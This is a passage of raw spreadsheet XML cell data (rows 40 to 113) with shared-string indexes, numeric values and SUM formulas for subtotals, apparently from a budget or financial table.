      <c r="D40" s="13" t="s">
        <v>4348</v>
      </c>
      <c r="E40" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F40" s="17">
        <v>1516</v>
      </c>
    </row>
    <row r="41" spans="1:6">
      <c r="A41" s="10" t="s">
        <v>4349</v>
      </c>
      <c r="B41" s="16" t="s">
        <v>2577</v>
      </c>
      <c r="C41" s="17">
        <v>0</v>
      </c>
      <c r="D41" s="13" t="s">
        <v>4350</v>
      </c>
      <c r="E41" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F41" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="42" spans="1:6">
      <c r="A42" s="10" t="s">
        <v>4351</v>
      </c>
      <c r="B42" s="16" t="s">
        <v>2578</v>
      </c>
      <c r="C42" s="17">
        <v>0</v>
      </c>
      <c r="D42" s="13" t="s">
        <v>4352</v>
      </c>
      <c r="E42" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F42" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="43" spans="1:6">
      <c r="A43" s="10" t="s">
        <v>4353</v>
      </c>
      <c r="B43" s="16" t="s">
        <v>2579</v>
      </c>
      <c r="C43" s="17">
        <v>0</v>
      </c>
      <c r="D43" s="13" t="s">
        <v>4354</v>
      </c>
      <c r="E43" s="16" t="s">
        <v>2580</v>
      </c>
      <c r="F43" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="44" spans="1:6">
      <c r="A44" s="10"/>
      <c r="B44" s="11" t="s">
        <v>2581</v>
      </c>
      <c r="C44" s="12">
        <f>C45+C48</f>
        <v>0</v>
      </c>
      <c r="D44" s="13" t="s">
        <v>4355</v>
      </c>
      <c r="E44" s="16" t="s">
        <v>2582</v>
      </c>
      <c r="F44" s="17">
        <v>35</v>
      </c>
    </row>
    <row r="45" spans="1:6">
      <c r="A45" s="10" t="s">
        <v>4356</v>
      </c>
      <c r="B45" s="16" t="s">
        <v>2583</v>
      </c>
      <c r="C45" s="12">
        <f>C46+C47</f>
        <v>0</v>
      </c>
      <c r="D45" s="13" t="s">
        <v>4357</v>
      </c>
      <c r="E45" s="16" t="s">
        <v>2584</v>
      </c>
      <c r="F45" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="46" spans="1:6">
      <c r="A46" s="10" t="s">
        <v>4358</v>
      </c>
      <c r="B46" s="16" t="s">
        <v>2585</v>
      </c>
      <c r="C46" s="17">
        <v>0</v>
      </c>
      <c r="D46" s="13" t="s">
        <v>4359</v>
      </c>
      <c r="E46" s="16" t="s">
        <v>2586</v>
      </c>
      <c r="F46" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="47" spans="1:6">
      <c r="A47" s="10" t="s">
        <v>4360</v>
      </c>
      <c r="B47" s="16" t="s">
        <v>2587</v>
      </c>
      <c r="C47" s="17">
        <v>0</v>
      </c>
      <c r="D47" s="13" t="s">
        <v>4361</v>
      </c>
      <c r="E47" s="16" t="s">
        <v>2588</v>
      </c>
      <c r="F47" s="17">
        <v>1</v>
      </c>
    </row>
    <row r="48" spans="1:6">
      <c r="A48" s="10" t="s">
        <v>4362</v>
      </c>
      <c r="B48" s="16" t="s">
        <v>2589</v>
      </c>
      <c r="C48" s="17">
        <v>0</v>
      </c>
      <c r="D48" s="13" t="s">
        <v>4363</v>
      </c>
      <c r="E48" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F48" s="17">
        <v>11</v>
      </c>
    </row>
    <row r="49" spans="1:6">
      <c r="A49" s="10" t="s">
        <v>4364</v>
      </c>
      <c r="B49" s="11" t="s">
        <v>2590</v>
      </c>
      <c r="C49" s="12">
        <f>SUM(C50:C66,C68:C90,C92:C94,C96:C98)</f>
        <v>28194</v>
      </c>
      <c r="D49" s="13" t="s">
        <v>4365</v>
      </c>
      <c r="E49" s="16" t="s">
        <v>2591</v>
      </c>
      <c r="F49" s="17">
        <v>190</v>
      </c>
    </row>
    <row r="50" spans="1:6">
      <c r="A50" s="10" t="s">
        <v>4366</v>
      </c>
      <c r="B50" s="16" t="s">
        <v>2592</v>
      </c>
      <c r="C50" s="17">
        <v>0</v>
      </c>
      <c r="D50" s="13" t="s">
        <v>4367</v>
      </c>
      <c r="E50" s="11" t="s">
        <v>2593</v>
      </c>
      <c r="F50" s="12">
        <f>SUM(F51:F60)</f>
        <v>651</v>
      </c>
    </row>
    <row r="51" spans="1:6">
      <c r="A51" s="10" t="s">
        <v>4368</v>
      </c>
      <c r="B51" s="16" t="s">
        <v>2594</v>
      </c>
      <c r="C51" s="17">
        <v>0</v>
      </c>
      <c r="D51" s="13" t="s">
        <v>4369</v>
      </c>
      <c r="E51" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F51" s="17">
        <v>261</v>
      </c>
    </row>
    <row r="52" spans="1:6">
      <c r="A52" s="10" t="s">
        <v>4370</v>
      </c>
      <c r="B52" s="16" t="s">
        <v>2595</v>
      </c>
      <c r="C52" s="17">
        <v>0</v>
      </c>
      <c r="D52" s="13" t="s">
        <v>4371</v>
      </c>
      <c r="E52" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F52" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="53" spans="1:6">
      <c r="A53" s="10" t="s">
        <v>4372</v>
      </c>
      <c r="B53" s="16" t="s">
        <v>2596</v>
      </c>
      <c r="C53" s="17">
        <v>0</v>
      </c>
      <c r="D53" s="13" t="s">
        <v>4373</v>
      </c>
      <c r="E53" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F53" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="54" spans="1:6">
      <c r="A54" s="10" t="s">
        <v>4374</v>
      </c>
      <c r="B54" s="16" t="s">
        <v>2597</v>
      </c>
      <c r="C54" s="17">
        <v>0</v>
      </c>
      <c r="D54" s="13" t="s">
        <v>4375</v>
      </c>
      <c r="E54" s="16" t="s">
        <v>2598</v>
      </c>
      <c r="F54" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="55" spans="1:6">
      <c r="A55" s="10" t="s">
        <v>4376</v>
      </c>
      <c r="B55" s="16" t="s">
        <v>2599</v>
      </c>
      <c r="C55" s="17">
        <v>0</v>
      </c>
      <c r="D55" s="13" t="s">
        <v>4377</v>
      </c>
      <c r="E55" s="16" t="s">
        <v>2600</v>
      </c>
      <c r="F55" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:6">
      <c r="A56" s="10" t="s">
        <v>4378</v>
      </c>
      <c r="B56" s="16" t="s">
        <v>2601</v>
      </c>
      <c r="C56" s="17">
        <v>0</v>
      </c>
      <c r="D56" s="13" t="s">
        <v>4379</v>
      </c>
      <c r="E56" s="16" t="s">
        <v>2602</v>
      </c>
      <c r="F56" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="57" spans="1:6">
      <c r="A57" s="10" t="s">
        <v>4380</v>
      </c>
      <c r="B57" s="16" t="s">
        <v>2603</v>
      </c>
      <c r="C57" s="17">
        <v>0</v>
      </c>
      <c r="D57" s="13" t="s">
        <v>4381</v>
      </c>
      <c r="E57" s="16" t="s">
        <v>2604</v>
      </c>
      <c r="F57" s="17">
        <v>32</v>
      </c>
    </row>
    <row r="58" spans="1:6">
      <c r="A58" s="10" t="s">
        <v>4382</v>
      </c>
      <c r="B58" s="16" t="s">
        <v>2605</v>
      </c>
      <c r="C58" s="17">
        <v>0</v>
      </c>
      <c r="D58" s="13" t="s">
        <v>4383</v>
      </c>
      <c r="E58" s="16" t="s">
        <v>2606</v>
      </c>
      <c r="F58" s="17">
        <v>30</v>
      </c>
    </row>
    <row r="59" spans="1:6">
      <c r="A59" s="10" t="s">
        <v>4384</v>
      </c>
      <c r="B59" s="16" t="s">
        <v>2607</v>
      </c>
      <c r="C59" s="17">
        <v>0</v>
      </c>
      <c r="D59" s="13" t="s">
        <v>4385</v>
      </c>
      <c r="E59" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F59" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="60" spans="1:6">
      <c r="A60" s="10" t="s">
        <v>4386</v>
      </c>
      <c r="B60" s="16" t="s">
        <v>2608</v>
      </c>
      <c r="C60" s="17">
        <v>0</v>
      </c>
      <c r="D60" s="13" t="s">
        <v>4387</v>
      </c>
      <c r="E60" s="16" t="s">
        <v>2609</v>
      </c>
      <c r="F60" s="17">
        <v>328</v>
      </c>
    </row>
    <row r="61" spans="1:6">
      <c r="A61" s="10" t="s">
        <v>4388</v>
      </c>
      <c r="B61" s="16" t="s">
        <v>2610</v>
      </c>
      <c r="C61" s="17">
        <v>0</v>
      </c>
      <c r="D61" s="13" t="s">
        <v>4389</v>
      </c>
      <c r="E61" s="11" t="s">
        <v>2611</v>
      </c>
      <c r="F61" s="12">
        <f>SUM(F62:F71)</f>
        <v>2453</v>
      </c>
    </row>
    <row r="62" spans="1:6">
      <c r="A62" s="10" t="s">
        <v>4390</v>
      </c>
      <c r="B62" s="16" t="s">
        <v>2612</v>
      </c>
      <c r="C62" s="17">
        <v>0</v>
      </c>
      <c r="D62" s="13" t="s">
        <v>4391</v>
      </c>
      <c r="E62" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F62" s="17">
        <v>1736</v>
      </c>
    </row>
    <row r="63" spans="1:6">
      <c r="A63" s="10" t="s">
        <v>4392</v>
      </c>
      <c r="B63" s="16" t="s">
        <v>2613</v>
      </c>
      <c r="C63" s="17">
        <v>0</v>
      </c>
      <c r="D63" s="13" t="s">
        <v>4393</v>
      </c>
      <c r="E63" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F63" s="17">
        <v>63</v>
      </c>
    </row>
    <row r="64" spans="1:6">
      <c r="A64" s="10" t="s">
        <v>4394</v>
      </c>
      <c r="B64" s="16" t="s">
        <v>2614</v>
      </c>
      <c r="C64" s="17">
        <v>0</v>
      </c>
      <c r="D64" s="13" t="s">
        <v>4395</v>
      </c>
      <c r="E64" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F64" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="65" spans="1:6">
      <c r="A65" s="10" t="s">
        <v>4396</v>
      </c>
      <c r="B65" s="16" t="s">
        <v>2615</v>
      </c>
      <c r="C65" s="17">
        <v>0</v>
      </c>
      <c r="D65" s="13" t="s">
        <v>4397</v>
      </c>
      <c r="E65" s="16" t="s">
        <v>2616</v>
      </c>
      <c r="F65" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="66" spans="1:6">
      <c r="A66" s="10" t="s">
        <v>4398</v>
      </c>
      <c r="B66" s="16" t="s">
        <v>2617</v>
      </c>
      <c r="C66" s="17">
        <v>0</v>
      </c>
      <c r="D66" s="13" t="s">
        <v>4399</v>
      </c>
      <c r="E66" s="16" t="s">
        <v>2618</v>
      </c>
      <c r="F66" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:6">
      <c r="A67" s="10" t="s">
        <v>4400</v>
      </c>
      <c r="B67" s="16" t="s">
        <v>2619</v>
      </c>
      <c r="C67" s="17">
        <v>0</v>
      </c>
      <c r="D67" s="13" t="s">
        <v>4401</v>
      </c>
      <c r="E67" s="16" t="s">
        <v>2620</v>
      </c>
      <c r="F67" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="68" spans="1:6">
      <c r="A68" s="10" t="s">
        <v>4402</v>
      </c>
      <c r="B68" s="16" t="s">
        <v>2621</v>
      </c>
      <c r="C68" s="17">
        <v>0</v>
      </c>
      <c r="D68" s="13" t="s">
        <v>4403</v>
      </c>
      <c r="E68" s="16" t="s">
        <v>2622</v>
      </c>
      <c r="F68" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="69" spans="1:6">
      <c r="A69" s="10" t="s">
        <v>4404</v>
      </c>
      <c r="B69" s="16" t="s">
        <v>2623</v>
      </c>
      <c r="C69" s="17">
        <v>0</v>
      </c>
      <c r="D69" s="13" t="s">
        <v>4405</v>
      </c>
      <c r="E69" s="16" t="s">
        <v>2624</v>
      </c>
      <c r="F69" s="17">
        <v>454</v>
      </c>
    </row>
    <row r="70" spans="1:6">
      <c r="A70" s="10" t="s">
        <v>4406</v>
      </c>
      <c r="B70" s="16" t="s">
        <v>2625</v>
      </c>
      <c r="C70" s="17">
        <v>0</v>
      </c>
      <c r="D70" s="13" t="s">
        <v>4407</v>
      </c>
      <c r="E70" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F70" s="17">
        <v>83</v>
      </c>
    </row>
    <row r="71" spans="1:6">
      <c r="A71" s="10" t="s">
        <v>4408</v>
      </c>
      <c r="B71" s="16" t="s">
        <v>2626</v>
      </c>
      <c r="C71" s="17">
        <v>0</v>
      </c>
      <c r="D71" s="13" t="s">
        <v>4409</v>
      </c>
      <c r="E71" s="16" t="s">
        <v>2627</v>
      </c>
      <c r="F71" s="17">
        <v>117</v>
      </c>
    </row>
    <row r="72" spans="1:6">
      <c r="A72" s="10" t="s">
        <v>4410</v>
      </c>
      <c r="B72" s="16" t="s">
        <v>2628</v>
      </c>
      <c r="C72" s="17">
        <v>0</v>
      </c>
      <c r="D72" s="13" t="s">
        <v>4411</v>
      </c>
      <c r="E72" s="11" t="s">
        <v>2629</v>
      </c>
      <c r="F72" s="12">
        <f>SUM(F73:F79)</f>
        <v>2748</v>
      </c>
    </row>
    <row r="73" spans="1:6">
      <c r="A73" s="10" t="s">
        <v>4412</v>
      </c>
      <c r="B73" s="16" t="s">
        <v>2630</v>
      </c>
      <c r="C73" s="17">
        <v>0</v>
      </c>
      <c r="D73" s="13" t="s">
        <v>4413</v>
      </c>
      <c r="E73" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F73" s="17">
        <v>2748</v>
      </c>
    </row>
    <row r="74" spans="1:6">
      <c r="A74" s="10" t="s">
        <v>4414</v>
      </c>
      <c r="B74" s="16" t="s">
        <v>2631</v>
      </c>
      <c r="C74" s="17">
        <v>0</v>
      </c>
      <c r="D74" s="13" t="s">
        <v>4415</v>
      </c>
      <c r="E74" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F74" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="75" spans="1:6">
      <c r="A75" s="10" t="s">
        <v>4416</v>
      </c>
      <c r="B75" s="16" t="s">
        <v>2632</v>
      </c>
      <c r="C75" s="17">
        <v>0</v>
      </c>
      <c r="D75" s="13" t="s">
        <v>4417</v>
      </c>
      <c r="E75" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F75" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="76" spans="1:6">
      <c r="A76" s="10" t="s">
        <v>4418</v>
      </c>
      <c r="B76" s="16" t="s">
        <v>2633</v>
      </c>
      <c r="C76" s="17">
        <v>0</v>
      </c>
      <c r="D76" s="13" t="s">
        <v>4419</v>
      </c>
      <c r="E76" s="16" t="s">
        <v>2622</v>
      </c>
      <c r="F76" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="77" spans="1:6">
      <c r="A77" s="10" t="s">
        <v>4420</v>
      </c>
      <c r="B77" s="16" t="s">
        <v>2634</v>
      </c>
      <c r="C77" s="17">
        <v>0</v>
      </c>
      <c r="D77" s="13" t="s">
        <v>4421</v>
      </c>
      <c r="E77" s="16" t="s">
        <v>2635</v>
      </c>
      <c r="F77" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="78" spans="1:6">
      <c r="A78" s="10" t="s">
        <v>4422</v>
      </c>
      <c r="B78" s="16" t="s">
        <v>2636</v>
      </c>
      <c r="C78" s="17">
        <v>0</v>
      </c>
      <c r="D78" s="13" t="s">
        <v>4423</v>
      </c>
      <c r="E78" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F78" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="79" spans="1:6">
      <c r="A79" s="10" t="s">
        <v>4424</v>
      </c>
      <c r="B79" s="16" t="s">
        <v>2637</v>
      </c>
      <c r="C79" s="17">
        <v>0</v>
      </c>
      <c r="D79" s="13" t="s">
        <v>4425</v>
      </c>
      <c r="E79" s="16" t="s">
        <v>2638</v>
      </c>
      <c r="F79" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="80" spans="1:6">
      <c r="A80" s="10" t="s">
        <v>4426</v>
      </c>
      <c r="B80" s="16" t="s">
        <v>2639</v>
      </c>
      <c r="C80" s="17">
        <v>0</v>
      </c>
      <c r="D80" s="13" t="s">
        <v>4427</v>
      </c>
      <c r="E80" s="11" t="s">
        <v>2640</v>
      </c>
      <c r="F80" s="12">
        <f>SUM(F81:F88)</f>
        <v>775</v>
      </c>
    </row>
    <row r="81" spans="1:6">
      <c r="A81" s="10" t="s">
        <v>4428</v>
      </c>
      <c r="B81" s="16" t="s">
        <v>2641</v>
      </c>
      <c r="C81" s="17">
        <v>2</v>
      </c>
      <c r="D81" s="13" t="s">
        <v>4429</v>
      </c>
      <c r="E81" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F81" s="17">
        <v>611</v>
      </c>
    </row>
    <row r="82" spans="1:6">
      <c r="A82" s="10" t="s">
        <v>4430</v>
      </c>
      <c r="B82" s="16" t="s">
        <v>2642</v>
      </c>
      <c r="C82" s="17">
        <v>225</v>
      </c>
      <c r="D82" s="13" t="s">
        <v>4431</v>
      </c>
      <c r="E82" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F82" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="83" spans="1:6">
      <c r="A83" s="10" t="s">
        <v>4432</v>
      </c>
      <c r="B83" s="16" t="s">
        <v>2643</v>
      </c>
      <c r="C83" s="17">
        <v>13577</v>
      </c>
      <c r="D83" s="13" t="s">
        <v>4433</v>
      </c>
      <c r="E83" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F83" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="84" spans="1:6">
      <c r="A84" s="10" t="s">
        <v>4434</v>
      </c>
      <c r="B84" s="16" t="s">
        <v>2644</v>
      </c>
      <c r="C84" s="17">
        <v>0</v>
      </c>
      <c r="D84" s="13" t="s">
        <v>4435</v>
      </c>
      <c r="E84" s="16" t="s">
        <v>2645</v>
      </c>
      <c r="F84" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="85" spans="1:6">
      <c r="A85" s="10" t="s">
        <v>4436</v>
      </c>
      <c r="B85" s="16" t="s">
        <v>2646</v>
      </c>
      <c r="C85" s="17">
        <v>3778</v>
      </c>
      <c r="D85" s="13" t="s">
        <v>4437</v>
      </c>
      <c r="E85" s="16" t="s">
        <v>2647</v>
      </c>
      <c r="F85" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="86" spans="1:6">
      <c r="A86" s="10" t="s">
        <v>4438</v>
      </c>
      <c r="B86" s="16" t="s">
        <v>2648</v>
      </c>
      <c r="C86" s="17">
        <v>6846</v>
      </c>
      <c r="D86" s="13" t="s">
        <v>4439</v>
      </c>
      <c r="E86" s="16" t="s">
        <v>2622</v>
      </c>
      <c r="F86" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="87" spans="1:6">
      <c r="A87" s="10" t="s">
        <v>4440</v>
      </c>
      <c r="B87" s="16" t="s">
        <v>2649</v>
      </c>
      <c r="C87" s="17">
        <v>3757</v>
      </c>
      <c r="D87" s="13" t="s">
        <v>4441</v>
      </c>
      <c r="E87" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F87" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="88" spans="1:6">
      <c r="A88" s="10" t="s">
        <v>4442</v>
      </c>
      <c r="B88" s="16" t="s">
        <v>2650</v>
      </c>
      <c r="C88" s="17">
        <v>0</v>
      </c>
      <c r="D88" s="13" t="s">
        <v>4443</v>
      </c>
      <c r="E88" s="16" t="s">
        <v>2651</v>
      </c>
      <c r="F88" s="17">
        <v>164</v>
      </c>
    </row>
    <row r="89" spans="1:6">
      <c r="A89" s="10" t="s">
        <v>4444</v>
      </c>
      <c r="B89" s="16" t="s">
        <v>2652</v>
      </c>
      <c r="C89" s="17">
        <v>0</v>
      </c>
      <c r="D89" s="13" t="s">
        <v>4445</v>
      </c>
      <c r="E89" s="11" t="s">
        <v>2653</v>
      </c>
      <c r="F89" s="12">
        <f>SUM(F90:F101)</f>
        <v>0</v>
      </c>
    </row>
    <row r="90" spans="1:6">
      <c r="A90" s="10" t="s">
        <v>4446</v>
      </c>
      <c r="B90" s="16" t="s">
        <v>2654</v>
      </c>
      <c r="C90" s="17">
        <v>0</v>
      </c>
      <c r="D90" s="13" t="s">
        <v>4447</v>
      </c>
      <c r="E90" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F90" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="91" spans="1:6">
      <c r="A91" s="10" t="s">
        <v>4448</v>
      </c>
      <c r="B91" s="16" t="s">
        <v>2655</v>
      </c>
      <c r="C91" s="17">
        <v>0</v>
      </c>
      <c r="D91" s="13" t="s">
        <v>4449</v>
      </c>
      <c r="E91" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F91" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="92" spans="1:6">
      <c r="A92" s="10" t="s">
        <v>4450</v>
      </c>
      <c r="B92" s="16" t="s">
        <v>2656</v>
      </c>
      <c r="C92" s="17">
        <v>0</v>
      </c>
      <c r="D92" s="13" t="s">
        <v>4451</v>
      </c>
      <c r="E92" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F92" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="93" spans="1:6">
      <c r="A93" s="10" t="s">
        <v>4452</v>
      </c>
      <c r="B93" s="16" t="s">
        <v>2657</v>
      </c>
      <c r="C93" s="17">
        <v>0</v>
      </c>
      <c r="D93" s="13" t="s">
        <v>4453</v>
      </c>
      <c r="E93" s="16" t="s">
        <v>2658</v>
      </c>
      <c r="F93" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="94" spans="1:6">
      <c r="A94" s="10" t="s">
        <v>4454</v>
      </c>
      <c r="B94" s="16" t="s">
        <v>2659</v>
      </c>
      <c r="C94" s="17">
        <v>0</v>
      </c>
      <c r="D94" s="13" t="s">
        <v>4455</v>
      </c>
      <c r="E94" s="16" t="s">
        <v>2660</v>
      </c>
      <c r="F94" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="95" spans="1:6">
      <c r="A95" s="10" t="s">
        <v>4456</v>
      </c>
      <c r="B95" s="16" t="s">
        <v>2661</v>
      </c>
      <c r="C95" s="17">
        <v>0</v>
      </c>
      <c r="D95" s="13" t="s">
        <v>4457</v>
      </c>
      <c r="E95" s="16" t="s">
        <v>2622</v>
      </c>
      <c r="F95" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="96" spans="1:6">
      <c r="A96" s="10" t="s">
        <v>4458</v>
      </c>
      <c r="B96" s="16" t="s">
        <v>2662</v>
      </c>
      <c r="C96" s="17">
        <v>0</v>
      </c>
      <c r="D96" s="13" t="s">
        <v>4459</v>
      </c>
      <c r="E96" s="16" t="s">
        <v>2663</v>
      </c>
      <c r="F96" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="97" spans="1:6">
      <c r="A97" s="10" t="s">
        <v>4460</v>
      </c>
      <c r="B97" s="16" t="s">
        <v>2664</v>
      </c>
      <c r="C97" s="17">
        <v>0</v>
      </c>
      <c r="D97" s="13" t="s">
        <v>4461</v>
      </c>
      <c r="E97" s="16" t="s">
        <v>2665</v>
      </c>
      <c r="F97" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="98" spans="1:6">
      <c r="A98" s="10" t="s">
        <v>4462</v>
      </c>
      <c r="B98" s="16" t="s">
        <v>2666</v>
      </c>
      <c r="C98" s="17">
        <v>9</v>
      </c>
      <c r="D98" s="13" t="s">
        <v>4463</v>
      </c>
      <c r="E98" s="16" t="s">
        <v>2667</v>
      </c>
      <c r="F98" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="99" spans="1:6">
      <c r="A99" s="10" t="s">
        <v>4464</v>
      </c>
      <c r="B99" s="11" t="s">
        <v>2668</v>
      </c>
      <c r="C99" s="17">
        <v>0</v>
      </c>
      <c r="D99" s="13" t="s">
        <v>4465</v>
      </c>
      <c r="E99" s="16" t="s">
        <v>2669</v>
      </c>
      <c r="F99" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="100" spans="1:6">
      <c r="A100" s="10" t="s">
        <v>2670</v>
      </c>
      <c r="B100" s="11" t="s">
        <v>2671</v>
      </c>
      <c r="C100" s="12">
        <f>C101+C107+C105+C106</f>
        <v>10317</v>
      </c>
      <c r="D100" s="13" t="s">
        <v>4466</v>
      </c>
      <c r="E100" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F100" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="101" spans="1:6">
      <c r="A101" s="10" t="s">
        <v>4467</v>
      </c>
      <c r="B101" s="16" t="s">
        <v>2672</v>
      </c>
      <c r="C101" s="12">
        <f>SUM(C102:C104)</f>
        <v>10530</v>
      </c>
      <c r="D101" s="13" t="s">
        <v>4468</v>
      </c>
      <c r="E101" s="16" t="s">
        <v>2673</v>
      </c>
      <c r="F101" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="102" spans="1:6">
      <c r="A102" s="10" t="s">
        <v>4469</v>
      </c>
      <c r="B102" s="16" t="s">
        <v>2674</v>
      </c>
      <c r="C102" s="17">
        <v>0</v>
      </c>
      <c r="D102" s="13" t="s">
        <v>4470</v>
      </c>
      <c r="E102" s="11" t="s">
        <v>2675</v>
      </c>
      <c r="F102" s="12">
        <f>SUM(F103:F110)</f>
        <v>3583</v>
      </c>
    </row>
    <row r="103" spans="1:6">
      <c r="A103" s="10" t="s">
        <v>4471</v>
      </c>
      <c r="B103" s="16" t="s">
        <v>2676</v>
      </c>
      <c r="C103" s="17">
        <v>0</v>
      </c>
      <c r="D103" s="13" t="s">
        <v>4472</v>
      </c>
      <c r="E103" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F103" s="17">
        <v>1958</v>
      </c>
    </row>
    <row r="104" spans="1:6">
      <c r="A104" s="10" t="s">
        <v>4473</v>
      </c>
      <c r="B104" s="16" t="s">
        <v>2677</v>
      </c>
      <c r="C104" s="17">
        <v>10530</v>
      </c>
      <c r="D104" s="13" t="s">
        <v>4474</v>
      </c>
      <c r="E104" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F104" s="17">
        <v>500</v>
      </c>
    </row>
    <row r="105" spans="1:6">
      <c r="A105" s="10" t="s">
        <v>4475</v>
      </c>
      <c r="B105" s="16" t="s">
        <v>2678</v>
      </c>
      <c r="C105" s="17">
        <v>-167</v>
      </c>
      <c r="D105" s="13" t="s">
        <v>4476</v>
      </c>
      <c r="E105" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F105" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="106" spans="1:6">
      <c r="A106" s="10" t="s">
        <v>4477</v>
      </c>
      <c r="B106" s="16" t="s">
        <v>2679</v>
      </c>
      <c r="C106" s="17">
        <v>-168</v>
      </c>
      <c r="D106" s="13" t="s">
        <v>4478</v>
      </c>
      <c r="E106" s="16" t="s">
        <v>2680</v>
      </c>
      <c r="F106" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="107" spans="1:6">
      <c r="A107" s="10" t="s">
        <v>4479</v>
      </c>
      <c r="B107" s="16" t="s">
        <v>2681</v>
      </c>
      <c r="C107" s="17">
        <v>122</v>
      </c>
      <c r="D107" s="13" t="s">
        <v>4480</v>
      </c>
      <c r="E107" s="16" t="s">
        <v>2682</v>
      </c>
      <c r="F107" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="108" spans="1:6">
      <c r="A108" s="10" t="s">
        <v>4481</v>
      </c>
      <c r="B108" s="11" t="s">
        <v>2683</v>
      </c>
      <c r="C108" s="12">
        <f>SUM(C109:C112)</f>
        <v>3645</v>
      </c>
      <c r="D108" s="13" t="s">
        <v>4482</v>
      </c>
      <c r="E108" s="16" t="s">
        <v>2684</v>
      </c>
      <c r="F108" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="109" spans="1:6">
      <c r="A109" s="10" t="s">
        <v>4483</v>
      </c>
      <c r="B109" s="16" t="s">
        <v>2685</v>
      </c>
      <c r="C109" s="17">
        <v>0</v>
      </c>
      <c r="D109" s="13" t="s">
        <v>4484</v>
      </c>
      <c r="E109" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F109" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="110" spans="1:6">
      <c r="A110" s="10" t="s">
        <v>4485</v>
      </c>
      <c r="B110" s="16" t="s">
        <v>2686</v>
      </c>
      <c r="C110" s="17">
        <v>916</v>
      </c>
      <c r="D110" s="13" t="s">
        <v>4486</v>
      </c>
      <c r="E110" s="16" t="s">
        <v>2687</v>
      </c>
      <c r="F110" s="17">
        <v>1125</v>
      </c>
    </row>
    <row r="111" spans="1:6">
      <c r="A111" s="10" t="s">
        <v>4487</v>
      </c>
      <c r="B111" s="16" t="s">
        <v>2688</v>
      </c>
      <c r="C111" s="17">
        <v>2728</v>
      </c>
      <c r="D111" s="13" t="s">
        <v>4488</v>
      </c>
      <c r="E111" s="11" t="s">
        <v>2689</v>
      </c>
      <c r="F111" s="12">
        <f>SUM(F112:F121)</f>
        <v>1899</v>
      </c>
    </row>
    <row r="112" spans="1:6">
      <c r="A112" s="10" t="s">
        <v>4489</v>
      </c>
      <c r="B112" s="16" t="s">
        <v>2690</v>
      </c>
      <c r="C112" s="17">
        <v>1</v>
      </c>
      <c r="D112" s="13" t="s">
        <v>4490</v>
      </c>
      <c r="E112" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F112" s="17">
        <v>647</v>
      </c>
    </row>
    <row r="113" spans="1:6">
      <c r="A113" s="10" t="s">
        <v>4491</v>
      </c>
      <c r="B113" s="11" t="s">
        <v>2691</v>
      </c>
      <c r="C113" s="17">
        <v>8079</v>
      </c>
